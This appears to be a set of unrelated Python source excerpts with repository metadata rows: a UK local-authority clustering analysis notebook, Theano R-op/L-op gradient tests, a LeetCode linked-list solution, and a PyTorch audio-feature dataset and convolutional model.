"https://www.arcgis.com/sharing/rest/content/items/c4f647d8a4a648d7b4a1ebf057f8aaa3/data"
)
.set_index(["LAD21CD"])["LAD21NM"]
.to_dict()
)
return {**county_json, **lad_json}
def get_code_nuts_lookup():
lad_nuts = (
pd.read_excel(
"https://www.arcgis.com/sharing/rest/content/items/c110087ae04a4cacb4ab0aef960936ce/data"
)
.set_index("LAD20CD")["ITL121NM"]
.to_dict()
)
lad_county = pipe(
fetch_geojson(
"https://services1.arcgis.com/ESMARspQHYMw9BZ9/arcgis/rest/services/LAD21_CTY21_EN_LU/FeatureServer/0/query?outFields=*&where=1%3D1&f=geojson"
),
lambda df: df.set_index("LAD21CD")["CTY21CD"],
)
return {
**{code: name for code, name in lad_nuts.items()},
**{lad_county[lad]: lad_nuts[lad] for lad in set(lad_county.keys())},
}
def plot_ey_perf(ey, year, gender):
"""LALALA"""
return (
alt.Chart(ey.query(f"year=={year}").query(f"gender=='{gender}'"))
.mark_boxplot()
.encode(
y="cluster:O",
color="cluster:N",
x="zscore",
tooltip=["la_name"],
column="indicator",
)
).properties(width=200)
def plot_ey_trend(ey, gender="Total"):
""" """
return (
alt.Chart(ey_bench.query(f"gender=='{gender}'"))
.mark_boxplot()
.encode(
x="year:O",
y="zscore",
column="cluster",
color="cluster:N",
row="indicator",
tooltip=["la_name", "cluster"],
)
).properties(width=100, height=100)
def plot_ey_year_comp(ey, gender="Total"):
""" """
return (
alt.Chart(ey_bench.query(f"gender=='{gender}'"))
.mark_boxplot()
.encode(
column="year:O",
y="zscore",
x="cluster:N",
color="cluster:N",
row="indicator",
tooltip=["la_name", "cluster"],
)
).properties(width=100, height=100)
def plot_ey_evol(ey_table, gender):
""" """
# return (alt.Chart(ey_table.query(f"gender=='{gender}'"))
# .mark_line(point=True)
# .encode(x="year",y="zscore",color="cluster:N",
# row="indicator",column="cluster",
# detail="la_name",tooltip=["la_name","year","zscore"])
# .properties(width=100,height=100))
all_lads = (
alt.Chart()
.mark_line(point=True)
.encode(
x="year:N",
y=alt.Y("zscore", scale=alt.Scale(zero=False)),
color="cluster:N",
detail="la_name",
tooltip=["la_name", "zscore"],
)
).properties(width=100, height=100)
mean = (
alt.Chart()
.mark_line(point=False, color="black")
.encode(
x="year:N",
y=alt.Y("median(zscore)", scale=alt.Scale(zero=False), title="Score"),
)
).properties(width=100, height=100)
return (
alt.layer(all_lads, mean, data=ey_table.query(f"gender=='{gender}'"))
.facet(row="indicator", column="cluster:N")
.resolve_scale(y="independent")
)
def phf_for_analysis(ph_table, cluster_lookup, code_name_lookup):
return (
phf.stack()
.reset_index(name="score")
.assign(cluster=lambda df: df["area_code"].map(cluster_lookup))
.assign(area_name=lambda df: df["area_code"].map(code_name_lookup))
)
def calc_mean_ph(ph_long):
ph_agg = pd.concat(
[
ph_long.rename(columns={"score": name})
.groupby(["cluster", "indicator_name_expanded"])[name]
.apply(lambda x: function(x))
for function, name in zip([np.mean, np.std], ["mean", "std"])
],
axis=1,
).reset_index()
return ph_agg.assign(
rank=lambda df: df["indicator_name_expanded"].map(
ph_agg.groupby("indicator_name_expanded")["mean"].std().rank(ascending=True)
)
)
# return (pd.concat([ph_long
# .rename(columns={"score":name})
# .groupby(["cluster","indicator_name_expanded"])[name].apply(lambda x: function(x)) for
# function,name in zip([np.mean, np.std],["mean","std"])],axis=1)
# .reset_index()
# .assign(rank = lambda df: df["indicator_name_expanded"]
# .map(ph_mean
# .groupby("indicator_name_expanded")["mean"]
# .std().rank(ascending=True))))
def phf_ttest(phf_long, sig_level=0.05, equal_var=True):
""" """
test_results = []
for ind in phf_long["indicator_name_expanded"].unique():
ind_df = phf_long.query(f"indicator_name_expanded == '{ind}'").reset_index(
drop=True
)
for cl in ind_df["cluster"].unique():
ttest = ttest_ind(
ind_df.query(f"cluster=={cl}")["score"],
ind_df.query(f"cluster!={cl}")["score"],
equal_var=equal_var,
)
test_results.append([ind, cl, ttest.pvalue])
return pd.DataFrame(
test_results, columns=["indicator", "cluster", "ttest_sign"]
).assign(is_sig=lambda df: df["ttest_sign"] < sig_level)
def plot_phf_differences(phf_long, sig_level=0.05, equal_var=True):
return (
alt.Chart(
pipe(phf_long, calc_mean_ph)
.merge(
phf_ttest(phf_long, sig_level, equal_var),
left_on=["indicator_name_expanded", "cluster"],
right_on=["indicator", "cluster"],
)
.query("is_sig == True")
)
.mark_rect(filled=True)
.encode(
x=alt.X(
"indicator_name_expanded",
sort=alt.EncodingSortField("rank", order="descending"),
axis=alt.Axis(labels=False, ticks=False),
),
y="cluster:N",
color=alt.Color("mean", scale=alt.Scale(scheme="Redblue", reverse=True)),
tooltip=["cluster", "indicator_name_expanded", "mean"],
)
.properties(width=800, height=300)
)
def plot_gender_gap_trend(gender_gap):
""" """
all_lads = (
alt.Chart()
.mark_line(point=True)
.encode(
x="year:N",
y=alt.Y("ratio", scale=alt.Scale(zero=False)),
color="cluster:N",
detail="new_la_code",
tooltip=["la_name", "ratio"],
)
).properties(width=100, height=100)
mean = (
alt.Chart()
.mark_line(point=False, color="black")
.encode(
x="year:N",
y=alt.Y("median(ratio)", scale=alt.Scale(zero=False), title="Gender ratio"),
)
).properties(width=100, height=100)
return (
alt.layer(all_lads, mean, data=gender_gap)
.facet(row="indicator", column="cluster:N")
.resolve_scale(y="independent")
)
def get_gender_gap(ey):
"""Calculates gender gap between boys and girls"""
return (
ey.groupby(["year", "indicator"])
.apply(
lambda df: df.pivot_table(
index="new_la_code", columns="gender", values="score"
).assign(ratio=lambda df_2: (df_2["Girls"] / df_2["Boys"]))["ratio"]
)
.reset_index(drop=False)
.assign(cluster=lambda df: df["new_la_code"].map(clust_lu))
# .assign(la_name = lambda df: df["new_la_code"].map(names_codes_lookup_2))
.assign(la_name=lambda df: df["new_la_code"].map(code_name_lookup))
# .dropna(axis=0,subset=["cluster"])
)
def plot_gender_gap_comp(gender_gap, year=2019):
"""Boxplot comparing gender gap across clusters"""
return (
alt.Chart(gender_gap.query(f"year=={year}"))
.mark_boxplot()
.encode(
y="cluster:N",
x=alt.X("ratio", scale=alt.Scale(zero=False)),
column="indicator",
tooltip=["la_name", "ratio"],
color="cluster:N",
)
.resolve_axis(x="independent")
.properties(width=200)
)
def plot_gender_gap_trend(gender_gap):
"""Visualise trends in gender gap"""
all_lads = (
alt.Chart()
.mark_line(point=True)
.encode(
x="year:N",
y=alt.Y("ratio", scale=alt.Scale(zero=False)),
color="cluster:N",
detail="new_la_code",
tooltip=["la_name", "ratio"],
)
).properties(width=100, height=100)
mean = (
alt.Chart()
.mark_line(point=False, color="black")
.encode(
x="year:N",
y=alt.Y("median(ratio)", scale=alt.Scale(zero=False), title="Gender ratio"),
)
).properties(width=100, height=100)
return (
alt.layer(all_lads, mean, data=gender_gap)
.facet(row="indicator", column="cluster:N")
.resolve_scale(y="independent")
)
# %% [markdown]
# ## Clustering diagnostics
# %%
diag = clustering_diagnostics()
# %%
alt.Chart(diag).mark_point(filled=True).encode(
x="pca", y="value", row="diagnostic_var", color="comm_resolution:O"
).resolve_scale(y="independent")
# %%
pca_mean = (
diag.groupby(["pca", "diagnostic_var"])["value"].median().reset_index(drop=False)
)
alt.Chart(pca_mean).mark_line(point=True).encode(
x="pca", y="value", color="diagnostic_var"
)
# %%
com_res_mean = (
diag.groupby(["comm_resolution", "diagnostic_var"])["value"]
.median()
.reset_index(drop=False)
)
alt.Chart(com_res_mean).mark_line(point=True).encode(
x="comm_resolution", y="value", color="diagnostic_var"
)
# %% [markdown]
# ## Extract clusters
# %%
ey = early_years_for_clustering()
phf = public_health_for_clustering()
# %%
clust = extract_clusters(phf, 5, 0.9, clustering_params)
# %%
code_name_lookup = make_code_name_lookup()
code_nut_lookup = get_code_nuts_lookup()
# %%
cluster_df = (
pd.Series(clust[1])
.reset_index(name="cluster")
.assign(geo_name=lambda df: df["index"].map(code_name_lookup))
.assign(nuts_name=lambda df: df["index"].map(code_nut_lookup))
.rename(columns={"index": "geo_code"})
)
# %% [markdown]
# ## Explore cluster results
# %% [markdown]
# ### Regional differences
# %%
clust_region_shares = (
cluster_df.groupby("cluster")["nuts_name"]
.apply(lambda x: x.value_counts(normalize=True))
.unstack()
.fillna(0)
.stack()
.reset_index(name="share")
.rename(columns={"level_1": "region"})
)
reg_bar = (
alt.Chart(clust_region_shares)
.mark_bar()
.encode(y="cluster:O", x="share", color="region")
)
reg_bar
# %% [markdown]
# ### EFSYP performance differences
# %%
clust_lu = cluster_df.set_index("geo_code")["cluster"].to_dict()
# %%
ey_bench = ey.assign(cluster=lambda df: df["new_la_code"].map(clust_lu)).dropna(
axis=0, subset=["cluster"]
)
# %%
ey_comp = (
ey.query("year==2019")
.query("gender=='Total'")
.assign(cluster=lambda df: df["new_la_code"].map(clust_lu))
.dropna(axis=0, subset=["cluster"])
)
# %%
plot_ey_perf(ey_bench, 2019, "Total")
# %%
plot_ey_perf(ey_bench, 2019, "Boys")
# %% [markdown]
# ### Evolution of differences
# %%
plot_ey_trend(ey_bench)
# %% [markdown]
# ### Year on year comparisons
# %%
plot_ey_year_comp(ey_bench)
# %%
(
ey_bench.query("gender=='Total'")
.groupby("indicator")
.apply(
lambda x: x.pivot_table(
index="new_la_code", columns="year", values="zscore"
).corr()
)[2019]
.unstack()
)
# %% [markdown]
# ### Differences between clusters
# %%
phf_long = phf_for_analysis(phf, clust_lu, code_name_lookup)
# %%
plot_phf_differences(phf_long, sig_level=0.01)
# %% [markdown]
# ### Improvements in performance inside clusters
# %%
# Where have we seen the greatest improvements inside clusters?
# %%
plot_ey_evol(ey_bench, "Girls")
# %%
# Other things to do:
# 1. Calculate SHAPLEY values for variables
# 2. measure gender gap in performance inside clusters
# 3. Create choropleth
# %%
# Gender gap
# %%
# %%
gender_gap = get_gender_gap(ey)
# %%
gender_gap.columns
# %%
gender_gap.loc[gender_gap["la_name"].isna()]
# %%
plot_gender_gap_comp(gender_gap, year=2019)
# %%
plot_gender_gap_trend(gender_gap)
# %%
la = fetch_geojson(
"https://services1.arcgis.com/ESMARspQHYMw9BZ9/arcgis/rest/services/Counties_and_Unitary_Authorities_December_2021_UK_BGC/FeatureServer/0/query?outFields=*&where=1%3D1&f=geojson"
)
# %%
names_codes_lookup_2 = la.set_index("CTYUA21CD")["CTYUA21NM"].to_dict()
# %%
names_codes_lookup_2
# %%
| nestauk/afs_neighbourhood_analysis | afs_neighbourhood_analysis/analysis/cluster_eda.py | cluster_eda.py | py | 14,185 | python | en | code | 0 | github-code | 36 |
42494180975 | """
WRITE ME
Tests for the R operator / L operator
For the list of op with r op defined, with or without missing test
see this file: doc/library/tensor/basic.txt
For function to automatically test your Rop implementation, look at
the docstring of the functions: check_mat_rop_lop, check_rop_lop,
check_nondiff_rop,
"""
from __future__ import absolute_import, print_function, division
import unittest
from theano.tests import unittest_tools as utt
from theano import function
import theano
from theano import tensor
import itertools
import numpy as np
from theano.gof import Op, Apply
from theano.gradient import grad_undefined
from theano.tests.unittest_tools import SkipTest
from theano.tensor.signal.pool import Pool
from theano.tensor.nnet import conv, conv2d
'''
Special Op created to test what happens when you have one op that is not
differentiable in the computational graph
'''
class BreakRop(Op):
"""
@note: Non-differentiable.
"""
__props__ = ()
def make_node(self, x):
return Apply(self, [x], [x.type()])
def perform(self, node, inp, out_):
x, = inp
out, = out_
out[0] = x
def grad(self, inp, grads):
return [grad_undefined(self, 0, inp[0])]
def R_op(self, inputs, eval_points):
return [None]
break_op = BreakRop()
class RopLop_checker(unittest.TestCase):
"""
Don't peform any test, but provide the function to test the
Rop to class that inherit from it.
"""
def setUp(self):
utt.seed_rng()
# Using vectors make things a lot simpler for generating the same
# computations using scan
self.x = tensor.vector('x')
self.v = tensor.vector('v')
self.rng = np.random.RandomState(utt.fetch_seed())
self.in_shape = (5 + self.rng.randint(3),)
self.mx = tensor.matrix('mx')
self.mv = tensor.matrix('mv')
self.mat_in_shape = (5 + self.rng.randint(3),
5 + self.rng.randint(3))
def check_nondiff_rop(self, y):
"""
If your op is not differentiable(so you can't define Rop)
test that an error is raised.
"""
raised = False
try:
tensor.Rop(y, self.x, self.v)
except ValueError:
raised = True
if not raised:
self.fail((
'Op did not raise an error even though the function'
' is not differentiable'))
def check_mat_rop_lop(self, y, out_shape):
"""
Test the Rop/Lop when input is a matrix and the output is a vector
:param y: the output variable of the op applied to self.mx
:param out_shape: Used to generate a random tensor
corresponding to the evaluation point of the Rop
(i.e. the tensor with which you multiply the
Jacobian). It should be a tuple of ints.
If the Op has more than 1 input, one of them must be mx, while
others must be shared variables / constants. We will test only
against the input self.mx, so you must call
check_mat_rop_lop/check_rop_lop for the other inputs.
We expect all inputs/outputs have dtype floatX.
If you want to test an Op with an output matrix, add a sum
after the Op you want to test.
"""
vx = np.asarray(self.rng.uniform(size=self.mat_in_shape),
theano.config.floatX)
vv = np.asarray(self.rng.uniform(size=self.mat_in_shape),
theano.config.floatX)
yv = tensor.Rop(y, self.mx, self.mv)
rop_f = function([self.mx, self.mv], yv, on_unused_input='ignore')
sy, _ = theano.scan(lambda i, y, x, v:
(tensor.grad(y[i], x) * v).sum(),
sequences=tensor.arange(y.shape[0]),
non_sequences=[y, self.mx, self.mv])
scan_f = function([self.mx, self.mv], sy, on_unused_input='ignore')
v1 = rop_f(vx, vv)
v2 = scan_f(vx, vv)
assert np.allclose(v1, v2), ('ROP mismatch: %s %s' % (v1, v2))
self.check_nondiff_rop(theano.clone(y, replace={self.mx: break_op(self.mx)}))
vv = np.asarray(self.rng.uniform(size=out_shape), theano.config.floatX)
yv = tensor.Lop(y, self.mx, self.v)
lop_f = function([self.mx, self.v], yv)
sy = tensor.grad((self.v * y).sum(), self.mx)
scan_f = function([self.mx, self.v], sy)
v1 = lop_f(vx, vv)
v2 = scan_f(vx, vv)
assert np.allclose(v1, v2), ('LOP mismatch: %s %s' % (v1, v2))
def check_rop_lop(self, y, out_shape):
"""
As check_mat_rop_lop, except the input is self.x which is a
vector. The output is still a vector.
"""
# TEST ROP
vx = np.asarray(self.rng.uniform(size=self.in_shape),
theano.config.floatX)
vv = np.asarray(self.rng.uniform(size=self.in_shape),
theano.config.floatX)
yv = tensor.Rop(y, self.x, self.v)
rop_f = function([self.x, self.v], yv, on_unused_input='ignore')
J, _ = theano.scan(lambda i, y, x: tensor.grad(y[i], x),
sequences=tensor.arange(y.shape[0]),
non_sequences=[y, self.x])
sy = tensor.dot(J, self.v)
scan_f = function([self.x, self.v], sy, on_unused_input='ignore')
v1 = rop_f(vx, vv)
v2 = scan_f(vx, vv)
assert np.allclose(v1, v2), ('ROP mismatch: %s %s' % (v1, v2))
known_fail = False
try:
self.check_nondiff_rop(theano.clone(y, replace={self.x: break_op(self.x)}))
except AssertionError:
known_fail = True
# TEST LOP
vx = np.asarray(self.rng.uniform(size=self.in_shape),
theano.config.floatX)
vv = np.asarray(self.rng.uniform(size=out_shape),
theano.config.floatX)
yv = tensor.Lop(y, self.x, self.v)
lop_f = function([self.x, self.v], yv, on_unused_input='ignore')
J, _ = theano.scan(lambda i, y, x: tensor.grad(y[i], x),
sequences=tensor.arange(y.shape[0]),
non_sequences=[y, self.x])
sy = tensor.dot(self.v, J)
scan_f = function([self.x, self.v], sy)
v1 = lop_f(vx, vv)
v2 = scan_f(vx, vv)
assert np.allclose(v1, v2), ('LOP mismatch: %s %s' % (v1, v2))
if known_fail:
raise SkipTest('Rop does not handle non-differentiable inputs '
'correctly. Bug exposed by fixing Add.grad method.')
class test_RopLop(RopLop_checker):
def test_shape(self):
self.check_nondiff_rop(self.x.shape[0])
def test_specifyshape(self):
self.check_rop_lop(tensor.specify_shape(self.x, self.in_shape),
self.in_shape)
def test_max(self):
# If we call max directly, we will return an CAReduce object
# which doesn't have R_op implemented!
# self.check_mat_rop_lop(tensor.max(self.mx, axis=[0,1])[0], ())
self.check_mat_rop_lop(tensor.max(self.mx, axis=0),
(self.mat_in_shape[1],))
self.check_mat_rop_lop(tensor.max(self.mx, axis=1),
(self.mat_in_shape[0],))
def test_argmax(self):
self.check_nondiff_rop(tensor.argmax(self.mx, axis=1))
def test_subtensor(self):
self.check_rop_lop(self.x[:4], (4,))
def test_incsubtensor1(self):
tv = np.asarray(self.rng.uniform(size=(3,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.inc_subtensor(self.x[:3], t)
self.check_rop_lop(out, self.in_shape)
def test_incsubtensor2(self):
tv = np.asarray(self.rng.uniform(size=(10,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.inc_subtensor(t[:4], self.x[:4])
self.check_rop_lop(out, (10,))
def test_setsubtensor1(self):
tv = np.asarray(self.rng.uniform(size=(3,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.set_subtensor(self.x[:3], t)
self.check_rop_lop(out, self.in_shape)
def test_print(self):
out = theano.printing.Print('x', attrs=('shape',))(self.x)
self.check_rop_lop(out, self.in_shape)
def test_setsubtensor2(self):
tv = np.asarray(self.rng.uniform(size=(10,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.set_subtensor(t[:4], self.x[:4])
self.check_rop_lop(out, (10,))
def test_dimshuffle(self):
# I need the sum, because the setup expects the output to be a
# vector
self.check_rop_lop(self.x[:4].dimshuffle('x', 0).sum(axis=0),
(4,))
def test_rebroadcast(self):
# I need the sum, because the setup expects the output to be a
# vector
self.check_rop_lop(tensor.unbroadcast(
self.x[:4].dimshuffle('x', 0), 0).sum(axis=1),
(1,))
def test_downsample(self):
rng = np.random.RandomState(utt.fetch_seed())
# ws, shp
examples = (
((2,), (16,)),
((2,), (4, 16,)),
((2,), (4, 2, 16,)),
((1, 1), (4, 2, 16, 16)),
((2, 2), (4, 2, 16, 16)),
((3, 3), (4, 2, 16, 16)),
((3, 2), (4, 2, 16, 16)),
((3, 2, 2), (3, 2, 16, 16, 16)),
((2, 3, 2), (3, 2, 16, 16, 16)),
((2, 2, 3), (3, 2, 16, 16, 16)),
((2, 2, 3, 2), (3, 2, 6, 6, 6, 5)),
)
for example, ignore_border in itertools.product(examples, [True, False]):
(ws, shp) = example
vx = rng.rand(*shp)
vex = rng.rand(*shp)
x = theano.shared(vx)
ex = theano.shared(vex)
maxpool_op = Pool(ignore_border, ndim=len(ws))
a_pooled = maxpool_op(x, ws).flatten()
yv = tensor.Rop(a_pooled, x, ex)
mode = None
if theano.config.mode == "FAST_COMPILE":
mode = "FAST_RUN"
rop_f = function([], yv, on_unused_input='ignore', mode=mode)
sy, _ = theano.scan(lambda i, y, x, v:
(tensor.grad(y[i], x) * v).sum(),
sequences=tensor.arange(a_pooled.shape[0]),
non_sequences=[a_pooled, x, ex],
mode=mode)
scan_f = function([], sy, on_unused_input='ignore', mode=mode)
v1 = rop_f()
v2 = scan_f()
assert np.allclose(v1, v2), ("Rop mismatch: %s %s" % (v1, v2))
def test_conv(self):
for conv_op in [conv.conv2d, conv2d]:
for border_mode in ['valid', 'full']:
image_shape = (2, 2, 4, 5)
filter_shape = (2, 2, 2, 3)
image_dim = len(image_shape)
filter_dim = len(filter_shape)
input = tensor.TensorType(
theano.config.floatX,
[False] * image_dim)(name='input')
filters = tensor.TensorType(
theano.config.floatX,
[False] * filter_dim)(name='filter')
ev_input = tensor.TensorType(
theano.config.floatX,
[False] * image_dim)(name='ev_input')
ev_filters = tensor.TensorType(
theano.config.floatX,
[False] * filter_dim)(name='ev_filters')
def sym_conv2d(input, filters):
return conv_op(input, filters, border_mode=border_mode)
output = sym_conv2d(input, filters).flatten()
yv = tensor.Rop(output, [input, filters], [ev_input, ev_filters])
mode = None
if theano.config.mode == "FAST_COMPILE":
mode = "FAST_RUN"
rop_f = function([input, filters, ev_input, ev_filters],
yv, on_unused_input='ignore', mode=mode)
sy, _ = theano.scan(lambda i, y, x1, x2, v1, v2:
(tensor.grad(y[i], x1) * v1).sum() +
(tensor.grad(y[i], x2) * v2).sum(),
sequences=tensor.arange(output.shape[0]),
non_sequences=[output, input, filters,
ev_input, ev_filters],
mode=mode)
scan_f = function([input, filters, ev_input, ev_filters], sy,
on_unused_input='ignore', mode=mode)
dtype = theano.config.floatX
image_data = np.random.random(image_shape).astype(dtype)
filter_data = np.random.random(filter_shape).astype(dtype)
ev_image_data = np.random.random(image_shape).astype(dtype)
ev_filter_data = np.random.random(filter_shape).astype(dtype)
v1 = rop_f(image_data, filter_data, ev_image_data, ev_filter_data)
v2 = scan_f(image_data, filter_data, ev_image_data, ev_filter_data)
assert np.allclose(v1, v2), ("Rop mismatch: %s %s" % (v1, v2))
def test_join(self):
tv = np.asarray(self.rng.uniform(size=(10,)),
theano.config.floatX)
t = theano.shared(tv)
out = tensor.join(0, self.x, t)
self.check_rop_lop(out, (self.in_shape[0] + 10,))
def test_dot(self):
insh = self.in_shape[0]
vW = np.asarray(self.rng.uniform(size=(insh, insh)),
theano.config.floatX)
W = theano.shared(vW)
self.check_rop_lop(tensor.dot(self.x, W), self.in_shape)
def test_elemwise0(self):
self.check_rop_lop((self.x + 1) ** 2, self.in_shape)
def test_elemwise1(self):
self.check_rop_lop(self.x + tensor.cast(self.x, 'int32'),
self.in_shape)
def test_reshape(self):
new_shape = tensor.constant(np.asarray([
self.mat_in_shape[0] * self.mat_in_shape[1]],
dtype='int64'))
self.check_mat_rop_lop(self.mx.reshape(new_shape),
(self.mat_in_shape[0] * self.mat_in_shape[1],))
def test_flatten(self):
self.check_mat_rop_lop(self.mx.flatten(),
(self.mat_in_shape[0] * self.mat_in_shape[1],))
def test_sum(self):
self.check_mat_rop_lop(self.mx.sum(axis=1), (self.mat_in_shape[0],))
def test_softmax(self):
# Softmax adds an extra dimnesion !
self.check_rop_lop(tensor.nnet.softmax(self.x)[0], self.in_shape[0])
def test_alloc(self):
# Alloc of the sum of x into a vector
out1d = tensor.alloc(self.x.sum(), self.in_shape[0])
self.check_rop_lop(out1d, self.in_shape[0])
# Alloc of x into a 3-D tensor, flattened
out3d = tensor.alloc(self.x, self.mat_in_shape[0], self.mat_in_shape[1], self.in_shape[0])
self.check_rop_lop(out3d.flatten(), self.mat_in_shape[0] * self.mat_in_shape[1] * self.in_shape[0])
def test_invalid_input(self):
success = False
try:
tensor.Rop(0., [tensor.matrix()], [tensor.vector()])
success = True
except ValueError:
pass
assert not success
def test_multiple_outputs(self):
m = tensor.matrix('m')
v = tensor.vector('v')
m_ = tensor.matrix('m_')
v_ = tensor.vector('v_')
mval = self.rng.uniform(size=(3, 7)).astype(theano.config.floatX)
vval = self.rng.uniform(size=(7,)).astype(theano.config.floatX)
m_val = self.rng.uniform(size=(3, 7)).astype(theano.config.floatX)
v_val = self.rng.uniform(size=(7,)).astype(theano.config.floatX)
rop_out1 = tensor.Rop([m, v, m + v], [m, v], [m_, v_])
assert isinstance(rop_out1, list)
assert len(rop_out1) == 3
rop_out2 = tensor.Rop((m, v, m + v), [m, v], [m_, v_])
assert isinstance(rop_out2, tuple)
assert len(rop_out2) == 3
all_outs = []
for o in rop_out1, rop_out2:
all_outs.extend(o)
f = theano.function([m, v, m_, v_], all_outs)
f(mval, vval, m_val, v_val)
def test_Rop_dot_bug_18Oct2013_Jeremiah(self):
# This test refers to a bug reported by Jeremiah Lowin on 18th Oct
# 2013. The bug consists when through a dot operation there is only
# one differentiable path (i.e. there is no gradient wrt to one of
# the inputs).
x = tensor.arange(20.0).reshape([1, 20])
v = theano.shared(np.ones([20]))
d = tensor.dot(x, v).sum()
tensor.Rop(tensor.grad(d, v), v, v)
| Theano/Theano | theano/tests/test_rop.py | test_rop.py | py | 17,055 | python | en | code | 9,807 | github-code | 36 |
19406242010 | #
# @lc app=leetcode id=24 lang=python3
#
# [24] Swap Nodes in Pairs
#
# @lc code=start
# Definition for singly-linked list.
from typing import Optional
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:
dummy = ListNode(0)
dummy.next = head
pre = dummy
while head and head.next:
left = head
right = head.next
pre.next = right
left.next = right.next
right.next = left
pre = left
head = pre.next
if head:
pre.next = head
return dummy.next
# @lc code=end
| Matthewow/Leetcode | vscode_extension/24.swap-nodes-in-pairs.py | 24.swap-nodes-in-pairs.py | py | 772 | python | en | code | 2 | github-code | 36 |
26884869558 | import torch
from torch.utils.data import Dataset
import torch.utils.data.dataloader as dataloader
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from numpy.matlib import repmat
import math
# Fixed number of time frames every feature matrix is cyclically tiled and
# then cropped to in Dataset.__getitem__ before being fed to the model.
MAX_LEN = 300
# Maps the audio-task prefix of a feature filename (text before the first
# underscore) to an integer class id for the audio-type classification head.
AUDIO_TYPE_ID = {'vowel-u': 0,'vowel-i': 1,'vowel-a': 2,'alphabet-a-z': 3, 'cough': 4, 'count-1-20': 5,}
# Indices of the openSMILE ("ovec") feature dimensions to keep.  The
# commented-out selections below are earlier experiments (hand-picked feature
# indices and larger index ranges); the active choice keeps the first 10.
# IMP_OVEC_FEAT = [16, 100, 709 , 88, 612, 484, 1390, 591, 94, 716, 499, 463, 373, 95, 1407, 86 ]#, \
#                  194, 401, 1389, 380, 381, 49, 495, 319, 1, 24, 685, 465, 711, 727, 1132, 695, \
#                  356, 726, 352, 10, 815, 729, 1153, 421, 332, 1327, 395, 700, 1432, 583, 1202, 754, 1306, 291]
# IMP_OVEC_FEAT = np.arange(1409,1582)
# IMP_OVEC_FEAT = np.arange(1582)
IMP_OVEC_FEAT = np.arange(10)
def uttToSpkChile(fullname):
    """Extract the raw speaker id from a feature file path.

    Basenames follow ``<task>_<speaker>_<...>``; the speaker id is the
    second underscore-separated token of the basename.
    """
    basename = fullname.split('/')[-1]
    return basename.split('_')[1]
class Dataset(Dataset):
    """Map-style dataset pairing MFCC feature files with openSMILE features.

    Each item yields a fixed-length ``(feature_dim, MAX_LEN)`` MFCC matrix,
    the binary label, the audio-task id, the speaker id, and the selected
    openSMILE ("ovec") features for the same utterance.
    """

    def __init__(self, X, Y, all_files_ovec, UTT_TO_SPK):
        """
        X              -- list of MFCC .npy file paths
        Y              -- labels (0/1), aligned with X
        all_files_ovec -- list of openSMILE .npy file paths to match against X
        UTT_TO_SPK     -- dict mapping a raw speaker id (see uttToSpkChile)
                          to an integer speaker index
        """
        self.X = X
        self.Y = Y
        self.mfc_to_ovec = self.mfcToOvec(X, all_files_ovec)
        self.UTT_TO_SPK = UTT_TO_SPK

    def __len__(self):
        'Denotes the total number of samples'
        return len(self.X)

    def mfcToOvec(self, all_files_mfc, all_files_ovec):
        """Return ``{mfc_file: ovec_file}`` matched on the utterance basename.

        An ovec basename carries one extra trailing ``_<suffix>`` token that
        is stripped before comparison.  Matching goes through a dict so the
        pairing is O(n + m) instead of the previous O(n * m) nested scan;
        as before, the first ovec file seen for a given basename wins, and
        MFC files with no counterpart are simply omitted from the result.
        """
        ovec_by_base = {}
        for ovec_file in all_files_ovec:
            base = ('_').join(ovec_file.split('/')[-1].split('.')[0].split('_')[:-1])
            # setdefault keeps the first occurrence, mirroring the old
            # first-match behaviour of the nested-loop implementation.
            ovec_by_base.setdefault(base, ovec_file)
        res = {}
        for mfc_file in all_files_mfc:
            base = mfc_file.split('/')[-1].split('.')[0]
            if base in ovec_by_base:
                res[mfc_file] = ovec_by_base[base]
        return res

    def __getitem__(self, index):
        x = self.X[index]  # MFCC feature file path
        y = self.Y[index]  # binary label (0/1)
        ovec_file = self.mfc_to_ovec[x]
        # Keep only the feature dimensions selected at module level.
        ovec_feat = np.load(ovec_file)[IMP_OVEC_FEAT]
        # Basenames look like "<audio task>_<speaker>_...", e.g. "cough_s1_...".
        audio_type = x.split('/')[-1].split('_')[0]
        spk = self.UTT_TO_SPK[uttToSpkChile(x)]
        feat = np.load(x)
        ### FOR SPEC ###
        # need to do the transpose for spectrograms but not for mfccs
        # feat = feat.transpose()
        ################
        # Cyclically repeat the utterance along time, then crop, so every
        # sample is exactly MAX_LEN frames long.
        feat = repmat(feat, int(math.ceil(MAX_LEN / feat.shape[0])), 1)
        feat = feat[:MAX_LEN, :]
        feat = feat.transpose()  # (MAX_LEN, D) -> (D, MAX_LEN)
        return feat, int(y), AUDIO_TYPE_ID[audio_type], spk, ovec_feat
class BasicBlock(nn.Module):
    """Residual block for 1-D features: two 3-wide convolutions with batch
    norm, a skip connection, and LeakyReLU activations."""

    def __init__(self, planes):
        super(BasicBlock, self).__init__()
        # Submodule names (and creation order) are preserved so existing
        # checkpoints and seeded initialisation stay compatible.
        self.conv1 = nn.Conv1d(planes, planes, 3, 1, 1, bias=False)
        self.bn1 = nn.BatchNorm1d(planes)
        self.relu = nn.ReLU(inplace=True)  # unused in forward, kept as-is
        self.leakyrelu = nn.LeakyReLU(inplace=True)
        self.conv2 = nn.Conv1d(planes, planes, 3, 1, 1, bias=False)
        self.bn2 = nn.BatchNorm1d(planes)

    def forward(self, x):
        identity = x
        out = self.leakyrelu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        # Residual add, then the final activation.
        out = self.leakyrelu(out + identity)
        return out
class conv_model1(nn.Module):
    # Encoder/decoder over 40-channel 1-D features plus three linear heads on
    # the pooled encoding: f2 (6-way audio type), f3 (speaker id), f4
    # (regression onto the IMP_OVEC_FEAT opensmile features).
    def __init__(self, TOTAL_NUM_SPKS):
        super(conv_model1, self).__init__()
        self.num_filter = 128
        self.encoder = nn.Conv1d(40, self.num_filter, 3, 1, bias=False, padding=1)
        self.encoder1 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False, padding=1)
        # Depthwise conv (groups == channels).
        self.encoder2 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False, padding=1, groups=self.num_filter)
        # self.decoder = nn.Conv1d(self.num_filter, 40, 3, 1, bias=False, padding=1)
